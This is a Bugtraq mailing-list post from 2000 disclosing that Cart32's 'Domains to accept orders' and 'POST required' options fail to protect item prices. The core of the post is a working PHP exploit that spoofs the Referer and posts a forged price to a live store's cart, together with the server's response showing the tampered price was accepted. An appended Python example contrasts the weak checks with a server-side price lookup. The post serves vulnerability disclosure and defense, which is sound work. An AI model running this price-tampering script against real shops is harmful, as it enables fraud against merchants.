Bugtraq mailing list archives
Re: Another hole in Cart32
From: cdi () THEWEBMASTERS NET (CDI)
Date: Tue, 23 May 2000 14:05:03 -0700
On Mon, 22 May 2000, sert sert wrote:
I attempted to contact the vendor earlier last month about resolving this problem and received the attached reply. They seem to be relying on the client to properly use the security options available in the package. John Scimone johnscimone () hotmail com
[snip]
What we did to help prevent this was add two fields into the Cart32
administration. The most important one is called "Domains to accept
orders". What you do with that is list all of the domains that can have
pages on them. Usually you would list your domain name and your secure
domain if it is different. Ex. www.cart32.com,cart32.com,secure.cart32.com
[snip]
The other field is called POST required. This means that a form must use
Method=post and not method=get. Also that means links, which use the GET
method, will not add to the cart.
Mark Pilkenton
Cart32 Technical Support
(417) 865-1283
support () cart32 com
--END
This message is mainly for Mark and the Cart32 engineers - the BugTraq
faithful are already well aware that the above "security options" are a
complete joke and a total waste of time.
Client-submitted data should never even be -trusted-, let alone be the
basis for your application's data integrity.
Here - let's pull the security blanket off of Cart32 and show them the
cold, hard facts of life.
This also shows that Cart32.com doesn't take its own damn advice...
----begin cart32.phtml (a PHP exploit for Cart32 Stupidity)----
<?php
/*
Caution - long lines ahead.
Cart32.phtml
Bypass lame "security" options by providing our own referer
and tainted data via POST.
cdi () thewebmasters net

PostToHost()
Heavily modified version of Rasmus' PostToHost function.
It's generic enough to handle any method containing
just about any data.
$data: urlencoded QUERY_STRING format
$cookie: urlencoded cookie string format (name=value;name=value).
*/
function PostToHost($host="",$port=80,$method="POST",$path="",$data="",$refer="",$client="",$cookie="")
{
    // Raw socket to the web server; header lines end in CRLF as HTTP requires.
    $fp = fsockopen($host,$port);
    if(!$fp) { echo "Failed to open port"; exit; }
    fputs($fp, "$method $path HTTP/1.0\r\n");
    // Every one of these headers is whatever the client chooses to send.
    if($cookie != "") { fputs($fp, "Cookie: $cookie\r\n"); }
    if($refer != "") { fputs($fp, "Referer: $refer\r\n"); }
    if($client != "") { fputs($fp, "User-Agent: $client\r\n"); }
    if($method == "POST")
    {
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: " . strlen($data) . "\r\n");
    }
    fputs($fp, "Connection: close\r\n\r\n");
    if($method == "POST")
    {
        // Body length must match Content-length exactly, so no trailing newline.
        fputs($fp, $data);
    }
    // Read the whole response (status line, headers and body) until the server closes.
    $results = "";
    while(!feof($fp))
    {
        $results .= fgets($fp, 1024);
    }
    fclose($fp);
    return $results;
}

// Whee, now all we need to do is set up the data
$host = 'www.cart32.com';
$port = 80;
$method = "POST";
$path = '/cgi-bin/cart32.exe/justsocks-AddItem';
$refer = 'www.IGuessYouDontTakeYourOwnAdvice.com';
// And even if they did, we could set the Referer to match
// anything we wanted.
$client = 'CDI Spoof (v1.0)';
$cookie = "";
// Real price of this product was $6.99
$data =
'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';
// And now call the function
$raw = PostToHost($host,$port,$method,$path,$data,$refer,$client,$cookie);
print "<PRE>\n\n";
print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n";
print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n";
print " Data: [$data]\n";
print "</PRE>\n";
print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
print "$raw\n";
?>
The JustSocks site is real and is hosted by Cart32.com - the data sent above
resulted in the following: (html removed)
Host: www.cart32.com
Port: [80]
Method: [POST]
Path: [/cgi-bin/cart32.exe/justsocks-AddItem]
Referer: [www.IGuessYouDontTakeYourOwnAdvice.com]
Client: [CDI Spoof (v1.0)]
Cookie: []
Data: [Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite]
Results of operation:
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 23 May 2000 20:54:04 GMT
Content-type: text/html
Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT
Added quantity 5 of Wigwam Triathlete Ultra-Lite for $1,000.56 each
CDI
____________________________________
The Web Master's Net
http://www.thewebmasters.net/
Today's Excuse:
poor power conditioning
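As an added example (not code from the post, from Cart32 or from the vendor), here is the server-side shape of the fix in Python: the vendor's two options, reconstructed as a function, accept a request whose Referer and method the sender chose, while a handler that looks prices up in its own catalog ignores the client-supplied Price entirely. The catalog, accepted-domain list and request body are constructed from the values quoted in the post.

```python
from urllib.parse import parse_qs

# Constructed server-side catalog: the only price an order may ever use.
CATALOG = {"F6092": ("Wigwam Triathlete Ultra-Lite", 6.99)}

# The "Domains to accept orders" list from the vendor reply.
ACCEPTED_DOMAINS = {"www.cart32.com", "cart32.com", "secure.cart32.com"}


def vendor_checks(method, headers):
    """'POST required' plus 'Domains to accept orders', as the vendor describes them.
    Both the method and the Referer header are supplied by the client, so a
    request that sets them to the expected values passes unchanged."""
    if method != "POST":
        return False
    referer = headers.get("Referer", "")
    host = referer.split("://", 1)[-1].split("/", 1)[0].lower()
    return host in ACCEPTED_DOMAINS


def add_item_trusting_client(body):
    """The pattern the post demonstrates: the price comes straight from the form."""
    f = parse_qs(body)
    return {"part": f["PartNo"][0], "qty": int(f["Qty"][0]), "price": float(f["Price"][0])}


def add_item_hardened(body):
    """Only PartNo and Qty are taken from the client, and both are validated.
    Price and item name are looked up server-side, so a forged Price field is inert."""
    f = parse_qs(body)
    part = f.get("PartNo", [""])[0]
    if part not in CATALOG:
        raise ValueError("unknown part number")
    qty = int(f.get("Qty", ["0"])[0])
    if not 1 <= qty <= 99:
        raise ValueError("quantity out of range")
    name, price = CATALOG[part]
    return {"part": part, "item": name, "qty": qty, "price": price}


# Constructed request mirroring the post's POST, with the Referer set to an accepted domain.
SPOOFED_BODY = "Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5"
SPOOFED_HEADERS = {"Referer": "http://www.cart32.com/justsocks.html"}

if __name__ == "__main__":
    print("vendor checks pass:", vendor_checks("POST", SPOOFED_HEADERS))
    print("trusting handler:", add_item_trusting_client(SPOOFED_BODY))
    print("hardened handler:", add_item_hardened(SPOOFED_BODY))
```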